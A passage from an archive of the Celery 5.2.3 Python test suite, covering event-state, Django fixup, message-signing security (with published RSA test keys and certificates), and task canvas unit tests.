'x', 'hostname': 'y', 'timestamp': time(), 'local_received': time(), 'clock': 0, }) def test_limits_maxtasks(self): s = State(max_tasks_in_memory=1) s.heap_multiplier = 2 s.event({ 'type': 'task-unknown-event-xxx', 'foo': 'bar', 'uuid': 'x', 'hostname': 'y', 'clock': 3, 'timestamp': time(), 'local_received': time(), }) s.event({ 'type': 'task-unknown-event-xxx', 'foo': 'bar', 'uuid': 'y', 'hostname': 'y', 'clock': 4, 'timestamp': time(), 'local_received': time(), }) s.event({ 'type': 'task-unknown-event-xxx', 'foo': 'bar', 'uuid': 'z', 'hostname': 'y', 'clock': 5, 'timestamp': time(), 'local_received': time(), }) assert len(s._taskheap) == 2 assert s._taskheap[0].clock == 4 assert s._taskheap[1].clock == 5 s._taskheap.append(s._taskheap[0]) assert list(s.tasks_by_time()) def test_callback(self): scratch = {} def callback(state, event): scratch['recv'] = True s = State(callback=callback) s.event({'type': 'worker-online'}) assert scratch.get('recv') def test_deepcopy(self): import copy s = State() s.event({ 'type': 'task-success', 'root_id': 'x', 'uuid': 'x', 'hostname': 'y', 'clock': 3, 'timestamp': time(), 'local_received': time(), }) s.event({ 'type': 'task-success', 'root_id': 'y', 'uuid': 'y', 'hostname': 'y', 'clock': 4, 'timestamp': time(), 'local_received': time(), }) copy.deepcopy(s) ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.819757 celery-5.2.3/t/unit/fixups/0000775000175000017500000000000000000000000015435 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/fixups/__init__.py0000664000175000017500000000000000000000000017534 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/fixups/test_django.py0000664000175000017500000002561100000000000020315 0ustar00asifasif00000000000000from contextlib import contextmanager from unittest.mock import Mock, patch import pytest from celery.fixups.django import (DjangoFixup, DjangoWorkerFixup, FixupWarning, _maybe_close_fd, fixup) from t.unit import conftest class FixupCase: Fixup = None @contextmanager def fixup_context(self, app): with patch('celery.fixups.django.DjangoWorkerFixup.validate_models'): with patch('celery.fixups.django.symbol_by_name') as symbyname: with patch('celery.fixups.django.import_module') as impmod: f = self.Fixup(app) yield f, impmod, symbyname class test_DjangoFixup(FixupCase): Fixup = DjangoFixup def test_setting_default_app(self): from celery import _state prev, _state.default_app = _state.default_app, None try: app = Mock(name='app') DjangoFixup(app) app.set_default.assert_called_with() finally: _state.default_app = prev @patch('celery.fixups.django.DjangoWorkerFixup') def test_worker_fixup_property(self, DjangoWorkerFixup): f = DjangoFixup(self.app) f._worker_fixup = None assert f.worker_fixup is DjangoWorkerFixup() assert f.worker_fixup is DjangoWorkerFixup() def test_on_import_modules(self): f = DjangoFixup(self.app) f.worker_fixup = Mock(name='worker_fixup') f.on_import_modules() f.worker_fixup.validate_models.assert_called_with() def test_autodiscover_tasks(self, patching): patching.modules('django.apps') from django.apps import apps f = DjangoFixup(self.app) configs = [Mock(name='c1'), Mock(name='c2')] apps.get_app_configs.return_value = configs assert f.autodiscover_tasks() == [c.name for c in configs] @pytest.mark.masked_modules('django') def test_fixup_no_django(self, patching, mask_modules): with patch('celery.fixups.django.DjangoFixup') as Fixup: patching.setenv('DJANGO_SETTINGS_MODULE', '') fixup(self.app) Fixup.assert_not_called() patching.setenv('DJANGO_SETTINGS_MODULE', 'settings') with pytest.warns(FixupWarning): fixup(self.app) Fixup.assert_not_called() def test_fixup(self, patching): with patch('celery.fixups.django.DjangoFixup') as Fixup: patching.setenv('DJANGO_SETTINGS_MODULE', '') fixup(self.app) Fixup.assert_not_called() patching.setenv('DJANGO_SETTINGS_MODULE', 'settings') with conftest.module_exists('django'): import django django.VERSION = (1, 11, 1) fixup(self.app) Fixup.assert_called() def test_maybe_close_fd(self): with patch('os.close'): _maybe_close_fd(Mock()) _maybe_close_fd(object()) def test_init(self): with self.fixup_context(self.app) as (f, importmod, sym): assert f def test_install(self, patching): self.app.loader = Mock() self.cw = patching('os.getcwd') self.p = patching('sys.path') self.sigs = patching('celery.fixups.django.signals') with self.fixup_context(self.app) as (f, _, _): self.cw.return_value = '/opt/vandelay' f.install() self.sigs.worker_init.connect.assert_called_with(f.on_worker_init) assert self.app.loader.now == f.now self.p.insert.assert_called_with(0, '/opt/vandelay') def test_now(self): with self.fixup_context(self.app) as (f, _, _): assert f.now(utc=True) f._now.assert_not_called() assert f.now(utc=False) f._now.assert_called() def test_on_worker_init(self): with self.fixup_context(self.app) as (f, _, _): with patch('celery.fixups.django.DjangoWorkerFixup') as DWF: f.on_worker_init() DWF.assert_called_with(f.app) DWF.return_value.install.assert_called_with() assert f._worker_fixup is DWF.return_value class test_DjangoWorkerFixup(FixupCase): Fixup = DjangoWorkerFixup def test_init(self): with self.fixup_context(self.app) as (f, importmod, sym): assert f def test_install(self): self.app.conf = {'CELERY_DB_REUSE_MAX': None} self.app.loader = Mock() with self.fixup_context(self.app) as (f, _, _): with patch('celery.fixups.django.signals') as sigs: f.install() sigs.beat_embedded_init.connect.assert_called_with( f.close_database, ) sigs.worker_ready.connect.assert_called_with(f.on_worker_ready) sigs.task_prerun.connect.assert_called_with(f.on_task_prerun) sigs.task_postrun.connect.assert_called_with(f.on_task_postrun) sigs.worker_process_init.connect.assert_called_with( f.on_worker_process_init, ) def test_on_worker_process_init(self, patching): with self.fixup_context(self.app) as (f, _, _): with patch('celery.fixups.django._maybe_close_fd') as mcf: _all = f._db.connections.all = Mock() conns = _all.return_value = [ Mock(), Mock(), ] conns[0].connection = None with patch.object(f, 'close_cache'): with patch.object(f, '_close_database'): f.on_worker_process_init() mcf.assert_called_with(conns[1].connection) f.close_cache.assert_called_with() f._close_database.assert_called_with(force=True) f.validate_models = Mock(name='validate_models') patching.setenv('FORKED_BY_MULTIPROCESSING', '1') f.on_worker_process_init() f.validate_models.assert_called_with() def test_on_task_prerun(self): task = Mock() with self.fixup_context(self.app) as (f, _, _): task.request.is_eager = False with patch.object(f, 'close_database'): f.on_task_prerun(task) f.close_database.assert_called_with() task.request.is_eager = True with patch.object(f, 'close_database'): f.on_task_prerun(task) f.close_database.assert_not_called() def test_on_task_postrun(self): task = Mock() with self.fixup_context(self.app) as (f, _, _): with patch.object(f, 'close_cache'): task.request.is_eager = False with patch.object(f, 'close_database'): f.on_task_postrun(task) f.close_database.assert_called() f.close_cache.assert_called() # when a task is eager, don't close connections with patch.object(f, 'close_cache'): task.request.is_eager = True with patch.object(f, 'close_database'): f.on_task_postrun(task) f.close_database.assert_not_called() f.close_cache.assert_not_called() def test_close_database(self): with self.fixup_context(self.app) as (f, _, _): with patch.object(f, '_close_database') as _close: f.db_reuse_max = None f.close_database() _close.assert_called_with() _close.reset_mock() f.db_reuse_max = 10 f._db_recycles = 3 f.close_database() _close.assert_not_called() assert f._db_recycles == 4 _close.reset_mock() f._db_recycles = 20 f.close_database() _close.assert_called_with() assert f._db_recycles == 1 def test__close_database(self): with self.fixup_context(self.app) as (f, _, _): conns = [Mock(), Mock(), Mock()] conns[1].close.side_effect = KeyError('already closed') f.DatabaseError = KeyError f.interface_errors = () f._db.connections = Mock() # ConnectionHandler f._db.connections.all.side_effect = lambda: conns f._close_database(force=True) conns[0].close.assert_called_with() conns[0].close_if_unusable_or_obsolete.assert_not_called() conns[1].close.assert_called_with() conns[1].close_if_unusable_or_obsolete.assert_not_called() conns[2].close.assert_called_with() conns[2].close_if_unusable_or_obsolete.assert_not_called() for conn in conns: conn.reset_mock() f._close_database() conns[0].close.assert_not_called() conns[0].close_if_unusable_or_obsolete.assert_called_with() conns[1].close.assert_not_called() conns[1].close_if_unusable_or_obsolete.assert_called_with() conns[2].close.assert_not_called() conns[2].close_if_unusable_or_obsolete.assert_called_with() conns[1].close.side_effect = KeyError( 'omg') f._close_database() with pytest.raises(KeyError): f._close_database(force=True) conns[1].close.side_effect = None conns[1].close_if_unusable_or_obsolete.side_effect = KeyError( 'omg') f._close_database(force=True) with pytest.raises(KeyError): f._close_database() def test_close_cache(self): with self.fixup_context(self.app) as (f, _, _): f.close_cache() f._cache.close_caches.assert_called_with() def test_on_worker_ready(self): with self.fixup_context(self.app) as (f, _, _): f._settings.DEBUG = False f.on_worker_ready() with pytest.warns(UserWarning): f._settings.DEBUG = True f.on_worker_ready() @pytest.mark.patched_module('django', 'django.db', 'django.core', 'django.core.cache', 'django.conf', 'django.db.utils') def test_validate_models(self, patching, module): f = self.Fixup(self.app) f.django_setup = Mock(name='django.setup') patching.modules('django.core.checks') from django.core.checks import run_checks f.validate_models() f.django_setup.assert_called_with() run_checks.assert_called_with() def test_django_setup(self, patching): patching('celery.fixups.django.symbol_by_name') patching('celery.fixups.django.import_module') django, = patching.modules('django') f = self.Fixup(self.app) f.django_setup() django.setup.assert_called_with() ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.819757 celery-5.2.3/t/unit/security/0000775000175000017500000000000000000000000015766 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/security/__init__.py0000664000175000017500000000700000000000000020074 0ustar00asifasif00000000000000""" Keys and certificates for tests (KEY1 is a private key of CERT1, etc.) Generated with `extra/security/get-cert.sh` """ KEY1 = """-----BEGIN RSA PRIVATE KEY----- MIICXQIBAAKBgQC9Twh0V5q/R1Q8N+Y+CNM4lj9AXeZL0gYowoK1ht2ZLCDU9vN5 dhV0x3sqaXLjQNeCGd6b2vTbFGdF2E45//IWz6/BdPFWaPm0rtYbcxZHqXDZScRp vFDLHhMysdqQWHxXVxpqIXXo4B7bnfnGvXhYwYITeEyQylV/rnH53mdV8wIDAQAB AoGBAKUJN4elr+S9nHP7D6BZNTsJ0Q6eTd0ftfrmx+jVMG8Oh3jh6ZSkG0R5e6iX 0W7I4pgrUWRyWDB98yJy1o+90CAN/D80o8SbmW/zfA2WLBteOujMfCEjNrc/Nodf 6MZ0QQ6PnPH6pp94i3kNmFD8Mlzm+ODrUjPF0dCNf474qeKhAkEA7SXj5cQPyQXM s15oGX5eb6VOk96eAPtEC72cLSh6o+VYmXyGroV1A2JPm6IzH87mTqjWXG229hjt XVvDbdY2uQJBAMxblWFaWJhhU6Y1euazaBl/OyLYlqNz4LZ0RzCulEoV/gMGYU32 PbilD5fpFsyhp5oCxnWNEsUFovYMKjKM3AsCQQCIlOcBoP76ZxWzRK8t56MaKBnu fiuAIzbYkDbPp12i4Wc61wZ2ozR2Y3u4Bh3tturb6M+04hea+1ZSC5StwM85AkAp UPLYpe13kWXaGsHoVqlbTk/kcamzDkCGYufpvcIZYGzkq6uMmZZM+II4klWbtasv BhSdu5Hp54PU/wyg/72VAkBy1/oM3/QJ35Vb6TByHBLFR4nOuORoRclmxcoCPva9 xqkQQn+UgBtOemRXpFCuKaoXonA3nLeB54SWcC6YUOcR -----END RSA PRIVATE KEY-----""" KEY2 = """-----BEGIN RSA PRIVATE KEY----- MIICXQIBAAKBgQDH22L8b9AmST9ABDmQTQ2DWMdDmK5YXZt4AIY81IcsTQ/ccM0C fwXEP9tdkYwtcxMCWdASwY5pfMy9vFp0hyrRQMSNfuoxAgONuNWPyQoIvY3ZXRe6 rS+hb/LN4+vdjX+oxmYiQ2HmSB9rh2bepE6Cw+RLJr5sXXq+xZJ+BLt5tQIDAQAB AoGBAMGBO0Arip/nP6Rd8tYypKjN5nEefX/1cjgoWdC//fj4zCil1vlZv12abm0U JWNEDd2y0/G1Eow0V5BFtFcrIFowU44LZEiSf7sKXlNHRHlbZmDgNXFZOt7nVbHn 6SN+oCYjaPjji8idYeb3VQXPtqMoMn73MuyxD3k3tWmVLonpAkEA6hsu62qhUk5k Nt88UZOauU1YizxsWvT0bHioaceE4TEsbO3NZs7dmdJIcRFcU787lANaaIq7Rw26 qcumME9XhwJBANqMOzsYQ6BX54UzS6x99Jjlq9MEbTCbAEZr/yjopb9f617SwfuE AEKnIq3HL6/Tnhv3V8Zy3wYHgDoGNeTVe+MCQQDi/nyeNAQ8RFqTgh2Ak/jAmCi0 yV/fSgj+bHgQKS/FEuMas/IoL4lbrzQivkyhv5lLSX0ORQaWPM+z+A0qZqRdAkBh XE+Wx/x4ljCh+nQf6AzrgIXHgBVUrfi1Zq9Jfjs4wnaMy793WRr0lpiwaigoYFHz i4Ei+1G30eeh8dpYk3KZAkB0ucTOsQynDlL5rLGYZ+IcfSfH3w2l5EszY47kKQG9 Fxeq/HOp9JYw4gRu6Ycvqu57KHwpHhR0FCXRBxuYcJ5V -----END RSA PRIVATE KEY-----""" CERT1 = """-----BEGIN CERTIFICATE----- MIICVzCCAcACCQC72PP7b7H9BTANBgkqhkiG9w0BAQUFADBwMQswCQYDVQQGEwJV UzELMAkGA1UECBMCQ0ExCzAJBgNVBAcTAlNGMQ8wDQYDVQQKEwZDZWxlcnkxDzAN BgNVBAMTBkNFbGVyeTElMCMGCSqGSIb3DQEJARYWY2VydEBjZWxlcnlwcm9qZWN0 Lm9yZzAeFw0xMzA3MjQxMjExMTRaFw0xNDA3MjQxMjExMTRaMHAxCzAJBgNVBAYT AlVTMQswCQYDVQQIEwJDQTELMAkGA1UEBxMCU0YxDzANBgNVBAoTBkNlbGVyeTEP MA0GA1UEAxMGQ0VsZXJ5MSUwIwYJKoZIhvcNAQkBFhZjZXJ0QGNlbGVyeXByb2pl Y3Qub3JnMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC9Twh0V5q/R1Q8N+Y+ CNM4lj9AXeZL0gYowoK1ht2ZLCDU9vN5dhV0x3sqaXLjQNeCGd6b2vTbFGdF2E45 //IWz6/BdPFWaPm0rtYbcxZHqXDZScRpvFDLHhMysdqQWHxXVxpqIXXo4B7bnfnG vXhYwYITeEyQylV/rnH53mdV8wIDAQABMA0GCSqGSIb3DQEBBQUAA4GBAKA4tD3J 94tsnQxFxHP7Frt7IvGMH+3wMqOiXFgYxPJX2tyaPvOLJ/7ERE4MkrvZO7IRC0iA yKBe0pucdrTgsJoDV8juahuyjXOjvU14+q7Wv7pj7zqddVavzK8STLX4/FMIDnbK aMGJl7wyj6V2yy6ANSbmy0uQjHikI6DrZEoK -----END CERTIFICATE-----""" CERT2 = """-----BEGIN CERTIFICATE----- MIICATCCAWoCCQCV/9A2ZBM37TANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0 cyBQdHkgTHRkMB4XDTExMDcxOTA5MDkwMloXDTEyMDcxODA5MDkwMlowRTELMAkG A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0 IFdpZGdpdHMgUHR5IEx0ZDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAx9ti /G/QJkk/QAQ5kE0Ng1jHQ5iuWF2beACGPNSHLE0P3HDNAn8FxD/bXZGMLXMTAlnQ EsGOaXzMvbxadIcq0UDEjX7qMQIDjbjVj8kKCL2N2V0Xuq0voW/yzePr3Y1/qMZm IkNh5kgfa4dm3qROgsPkSya+bF16vsWSfgS7ebUCAwEAATANBgkqhkiG9w0BAQUF AAOBgQBzaZ5vBkzksPhnWb2oobuy6Ne/LMEtdQ//qeVY4sKl2tOJUCSdWRen9fqP e+zYdEdkFCd8rp568Eiwkq/553uy4rlE927/AEqs/+KGYmAtibk/9vmi+/+iZXyS WWZybzzDZFncq1/N1C3Y/hrCBNDFO4TsnTLAhWtZ4c0vDAiacw== -----END CERTIFICATE-----""" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/security/case.py0000664000175000017500000000014600000000000017254 0ustar00asifasif00000000000000import pytest class SecurityCase: def setup(self): pytest.importorskip('cryptography') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/security/test_certificate.py0000664000175000017500000000625200000000000021666 0ustar00asifasif00000000000000import datetime import os from unittest.mock import Mock, patch import pytest from celery.exceptions import SecurityError from celery.security.certificate import Certificate, CertStore, FSCertStore from t.unit import conftest from . import CERT1, CERT2, KEY1 from .case import SecurityCase class test_Certificate(SecurityCase): def test_valid_certificate(self): Certificate(CERT1) Certificate(CERT2) def test_invalid_certificate(self): with pytest.raises((SecurityError, TypeError)): Certificate(None) with pytest.raises(SecurityError): Certificate('') with pytest.raises(SecurityError): Certificate('foo') with pytest.raises(SecurityError): Certificate(CERT1[:20] + CERT1[21:]) with pytest.raises(SecurityError): Certificate(KEY1) @pytest.mark.skip('TODO: cert expired') def test_has_expired(self): assert not Certificate(CERT1).has_expired() def test_has_expired_mock(self): x = Certificate(CERT1) x._cert = Mock(name='cert') time_after = datetime.datetime.utcnow() + datetime.timedelta(days=-1) x._cert.not_valid_after = time_after assert x.has_expired() is True def test_has_not_expired_mock(self): x = Certificate(CERT1) x._cert = Mock(name='cert') time_after = datetime.datetime.utcnow() + datetime.timedelta(days=1) x._cert.not_valid_after = time_after assert x.has_expired() is False class test_CertStore(SecurityCase): def test_itercerts(self): cert1 = Certificate(CERT1) cert2 = Certificate(CERT2) certstore = CertStore() for c in certstore.itercerts(): assert False certstore.add_cert(cert1) certstore.add_cert(cert2) for c in certstore.itercerts(): assert c in (cert1, cert2) def test_duplicate(self): cert1 = Certificate(CERT1) certstore = CertStore() certstore.add_cert(cert1) with pytest.raises(SecurityError): certstore.add_cert(cert1) class test_FSCertStore(SecurityCase): @patch('os.path.isdir') @patch('glob.glob') @patch('celery.security.certificate.Certificate') def test_init(self, Certificate, glob, isdir): cert = Certificate.return_value = Mock() cert.has_expired.return_value = False isdir.return_value = True glob.return_value = ['foo.cert'] with conftest.open(): cert.get_id.return_value = 1 path = os.path.join('var', 'certs') x = FSCertStore(path) assert 1 in x._certs glob.assert_called_with(os.path.join(path, '*')) # they both end up with the same id glob.return_value = ['foo.cert', 'bar.cert'] with pytest.raises(SecurityError): x = FSCertStore(path) glob.return_value = ['foo.cert'] cert.has_expired.return_value = True with pytest.raises(SecurityError): x = FSCertStore(path) isdir.return_value = False with pytest.raises(SecurityError): x = FSCertStore(path) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/security/test_key.py0000664000175000017500000000205500000000000020171 0ustar00asifasif00000000000000import pytest from kombu.utils.encoding import ensure_bytes from celery.exceptions import SecurityError from celery.security.key import PrivateKey from celery.security.utils import get_digest_algorithm from . import CERT1, KEY1, KEY2 from .case import SecurityCase class test_PrivateKey(SecurityCase): def test_valid_private_key(self): PrivateKey(KEY1) PrivateKey(KEY2) def test_invalid_private_key(self): with pytest.raises((SecurityError, TypeError)): PrivateKey(None) with pytest.raises(SecurityError): PrivateKey('') with pytest.raises(SecurityError): PrivateKey('foo') with pytest.raises(SecurityError): PrivateKey(KEY1[:20] + KEY1[21:]) with pytest.raises(SecurityError): PrivateKey(CERT1) def test_sign(self): pkey = PrivateKey(KEY1) pkey.sign(ensure_bytes('test'), get_digest_algorithm()) with pytest.raises(AttributeError): pkey.sign(ensure_bytes('test'), get_digest_algorithm('unknown')) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/security/test_security.py0000664000175000017500000001257600000000000021261 0ustar00asifasif00000000000000"""Keys and certificates for tests (KEY1 is a private key of CERT1, etc.) Generated with: .. code-block:: console $ openssl genrsa -des3 -passout pass:test -out key1.key 1024 $ openssl req -new -key key1.key -out key1.csr -passin pass:test $ cp key1.key key1.key.org $ openssl rsa -in key1.key.org -out key1.key -passin pass:test $ openssl x509 -req -days 365 -in cert1.csr \ -signkey key1.key -out cert1.crt $ rm key1.key.org cert1.csr """ import builtins import os import tempfile from unittest.mock import Mock, patch import pytest from kombu.exceptions import SerializerNotInstalled from kombu.serialization import disable_insecure_serializers, registry from celery.exceptions import ImproperlyConfigured, SecurityError from celery.security import disable_untrusted_serializers, setup_security from celery.security.utils import reraise_errors from t.unit import conftest from . import CERT1, KEY1 from .case import SecurityCase class test_security(SecurityCase): def teardown(self): registry._disabled_content_types.clear() registry._set_default_serializer('json') try: registry.unregister('auth') except SerializerNotInstalled: pass def test_disable_insecure_serializers(self): try: disabled = registry._disabled_content_types assert disabled disable_insecure_serializers( ['application/json', 'application/x-python-serialize'], ) assert 'application/x-yaml' in disabled assert 'application/json' not in disabled assert 'application/x-python-serialize' not in disabled disabled.clear() disable_insecure_serializers(allowed=None) assert 'application/x-yaml' in disabled assert 'application/json' in disabled assert 'application/x-python-serialize' in disabled finally: disable_insecure_serializers(allowed=['json']) @patch('celery.security._disable_insecure_serializers') def test_disable_untrusted_serializers(self, disable): disable_untrusted_serializers(['foo']) disable.assert_called_with(allowed=['foo']) def test_setup_security(self): with tempfile.NamedTemporaryFile(mode='w', delete=False) as tmp_key1: tmp_key1.write(KEY1) with tempfile.NamedTemporaryFile(mode='w', delete=False) as tmp_cert1: tmp_cert1.write(CERT1) self.app.conf.update( task_serializer='auth', accept_content=['auth'], security_key=tmp_key1.name, security_certificate=tmp_cert1.name, security_cert_store='*.pem', ) self.app.setup_security() os.remove(tmp_key1.name) os.remove(tmp_cert1.name) def test_setup_security_disabled_serializers(self): disabled = registry._disabled_content_types assert len(disabled) == 0 self.app.conf.task_serializer = 'json' with pytest.raises(ImproperlyConfigured): self.app.setup_security() assert 'application/x-python-serialize' in disabled disabled.clear() self.app.conf.task_serializer = 'auth' with pytest.raises(ImproperlyConfigured): self.app.setup_security() assert 'application/json' in disabled disabled.clear() @patch('celery.current_app') def test_setup_security__default_app(self, current_app): with pytest.raises(ImproperlyConfigured): setup_security() @patch('celery.security.register_auth') @patch('celery.security._disable_insecure_serializers') def test_setup_registry_complete(self, dis, reg, key='KEY', cert='CERT'): calls = [0] def effect(*args): try: m = Mock() m.read.return_value = 'B' if calls[0] else 'A' return m finally: calls[0] += 1 self.app.conf.task_serializer = 'auth' self.app.conf.accept_content = ['auth'] with conftest.open(side_effect=effect): with patch('celery.security.registry') as registry: store = Mock() self.app.setup_security(['json'], key, cert, store) dis.assert_called_with(['json']) reg.assert_called_with('A', 'B', store, 'sha256', 'json') registry._set_default_serializer.assert_called_with('auth') def test_security_conf(self): self.app.conf.task_serializer = 'auth' with pytest.raises(ImproperlyConfigured): self.app.setup_security() self.app.conf.accept_content = ['auth'] with pytest.raises(ImproperlyConfigured): self.app.setup_security() _import = builtins.__import__ def import_hook(name, *args, **kwargs): if name == 'cryptography': raise ImportError return _import(name, *args, **kwargs) builtins.__import__ = import_hook with pytest.raises(ImproperlyConfigured): self.app.setup_security() builtins.__import__ = _import def test_reraise_errors(self): with pytest.raises(SecurityError): with reraise_errors(errors=(KeyError,)): raise KeyError('foo') with pytest.raises(KeyError): with reraise_errors(errors=(ValueError,)): raise KeyError('bar') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/security/test_serialization.py0000664000175000017500000000425200000000000022257 0ustar00asifasif00000000000000import base64 import os import pytest from kombu.serialization import registry from kombu.utils.encoding import bytes_to_str from celery.exceptions import SecurityError from celery.security.certificate import Certificate, CertStore from celery.security.key import PrivateKey from celery.security.serialization import SecureSerializer, register_auth from . import CERT1, CERT2, KEY1, KEY2 from .case import SecurityCase class test_secureserializer(SecurityCase): def _get_s(self, key, cert, certs): store = CertStore() for c in certs: store.add_cert(Certificate(c)) return SecureSerializer(PrivateKey(key), Certificate(cert), store) def test_serialize(self): s = self._get_s(KEY1, CERT1, [CERT1]) assert s.deserialize(s.serialize('foo')) == 'foo' def test_deserialize(self): s = self._get_s(KEY1, CERT1, [CERT1]) with pytest.raises(SecurityError): s.deserialize('bad data') def test_unmatched_key_cert(self): s = self._get_s(KEY1, CERT2, [CERT1, CERT2]) with pytest.raises(SecurityError): s.deserialize(s.serialize('foo')) def test_unknown_source(self): s1 = self._get_s(KEY1, CERT1, [CERT2]) s2 = self._get_s(KEY1, CERT1, []) with pytest.raises(SecurityError): s1.deserialize(s1.serialize('foo')) with pytest.raises(SecurityError): s2.deserialize(s2.serialize('foo')) def test_self_send(self): s1 = self._get_s(KEY1, CERT1, [CERT1]) s2 = self._get_s(KEY1, CERT1, [CERT1]) assert s2.deserialize(s1.serialize('foo')) == 'foo' def test_separate_ends(self): s1 = self._get_s(KEY1, CERT1, [CERT2]) s2 = self._get_s(KEY2, CERT2, [CERT1]) assert s2.deserialize(s1.serialize('foo')) == 'foo' def test_register_auth(self): register_auth(KEY1, CERT1, '') assert 'application/data' in registry._decoders def test_lots_of_sign(self): for i in range(1000): rdata = bytes_to_str(base64.urlsafe_b64encode(os.urandom(265))) s = self._get_s(KEY1, CERT1, [CERT1]) assert s.deserialize(s.serialize(rdata)) == rdata ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.8317573 celery-5.2.3/t/unit/tasks/0000775000175000017500000000000000000000000015244 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/tasks/__init__.py0000664000175000017500000000000000000000000017343 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/t/unit/tasks/test_canvas.py0000664000175000017500000015203600000000000020137 0ustar00asifasif00000000000000import json from unittest.mock import ANY, MagicMock, Mock, call, patch, sentinel import pytest import pytest_subtests # noqa: F401 from celery._state import _task_stack from celery.canvas import (Signature, _chain, _maybe_group, chain, chord, chunks, group, maybe_signature, maybe_unroll_group, signature, xmap, xstarmap) from celery.result import AsyncResult, EagerResult, GroupResult SIG = Signature({ 'task': 'TASK', 'args': ('A1',), 'kwargs': {'K1': 'V1'}, 'options': {'task_id': 'TASK_ID'}, 'subtask_type': ''}, ) class test_maybe_unroll_group: def test_when_no_len_and_no_length_hint(self): g = MagicMock(name='group') g.tasks.__len__.side_effect = TypeError() g.tasks.__length_hint__ = Mock() g.tasks.__length_hint__.return_value = 0 assert maybe_unroll_group(g) is g g.tasks.__length_hint__.side_effect = AttributeError() assert maybe_unroll_group(g) is g class CanvasCase: def setup(self): @self.app.task(shared=False) def add(x, y): return x + y self.add = add @self.app.task(shared=False) def mul(x, y): return x * y self.mul = mul @self.app.task(shared=False) def div(x, y): return x / y self.div = div class test_Signature(CanvasCase): def test_getitem_property_class(self): assert Signature.task assert Signature.args assert Signature.kwargs assert Signature.options assert Signature.subtask_type def test_getitem_property(self): assert SIG.task == 'TASK' assert SIG.args == ('A1',) assert SIG.kwargs == {'K1': 'V1'} assert SIG.options == {'task_id': 'TASK_ID'} assert SIG.subtask_type == '' def test_call(self): x = Signature('foo', (1, 2), {'arg1': 33}, app=self.app) x.type = Mock(name='type') x(3, 4, arg2=66) x.type.assert_called_with(3, 4, 1, 2, arg1=33, arg2=66) def test_link_on_scalar(self): x = Signature('TASK', link=Signature('B')) assert x.options['link'] x.link(Signature('C')) assert isinstance(x.options['link'], list) assert Signature('B') in x.options['link'] assert Signature('C') in x.options['link'] def test_json(self): x = Signature('TASK', link=Signature('B', app=self.app), app=self.app) assert x.__json__() == dict(x) @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): x = Signature('TASK', (2, 4), app=self.app) fun, args = x.__reduce__() assert fun(*args) == x def test_replace(self): x = Signature('TASK', ('A',), {}) assert x.replace(args=('B',)).args == ('B',) assert x.replace(kwargs={'FOO': 'BAR'}).kwargs == { 'FOO': 'BAR', } assert x.replace(options={'task_id': '123'}).options == { 'task_id': '123', } def test_set(self): assert Signature('TASK', x=1).set(task_id='2').options == { 'x': 1, 'task_id': '2', } def test_link(self): x = signature(SIG) x.link(SIG) x.link(SIG) assert SIG in x.options['link'] assert len(x.options['link']) == 1 def test_link_error(self): x = signature(SIG) x.link_error(SIG) x.link_error(SIG) assert SIG in x.options['link_error'] assert len(x.options['link_error']) == 1 def test_flatten_links(self): tasks = [self.add.s(2, 2), self.mul.s(4), self.div.s(2)] tasks[0].link(tasks[1]) tasks[1].link(tasks[2]) assert tasks[0].flatten_links() == tasks def test_OR(self): x = self.add.s(2, 2) | self.mul.s(4) assert isinstance(x, _chain) y = self.add.s(4, 4) | self.div.s(2) z = x | y assert isinstance(y, _chain) assert isinstance(z, _chain) assert len(z.tasks) == 4 with pytest.raises(TypeError): x | 10 ax = self.add.s(2, 2) | (self.add.s(4) | self.add.s(8)) assert isinstance(ax, _chain) assert len(ax.tasks), 3 == 'consolidates chain to chain' def test_INVERT(self): x = self.add.s(2, 2) x.apply_async = Mock() x.apply_async.return_value = Mock() x.apply_async.return_value.get = Mock() x.apply_async.return_value.get.return_value = 4 assert ~x == 4 x.apply_async.assert_called() def test_merge_immutable(self): x = self.add.si(2, 2, foo=1) args, kwargs, options = x._merge((4,), {'bar': 2}, {'task_id': 3}) assert args == (2, 2) assert kwargs == {'foo': 1} assert options == {'task_id': 3} def test_merge_options__none(self): sig = self.add.si() _, _, new_options = sig._merge() assert new_options is sig.options _, _, new_options = sig._merge(options=None) assert new_options is sig.options @pytest.mark.parametrize("immutable_sig", (True, False)) def test_merge_options__group_id(self, immutable_sig): # This is to avoid testing the behaviour in `test_set_immutable()` if immutable_sig: sig = self.add.si() else: sig = self.add.s() # If the signature has no group ID, it can be set assert not sig.options _, _, new_options = sig._merge(options={"group_id": sentinel.gid}) assert new_options == {"group_id": sentinel.gid} # But if one is already set, the new one is silently ignored sig.set(group_id=sentinel.old_gid) _, _, 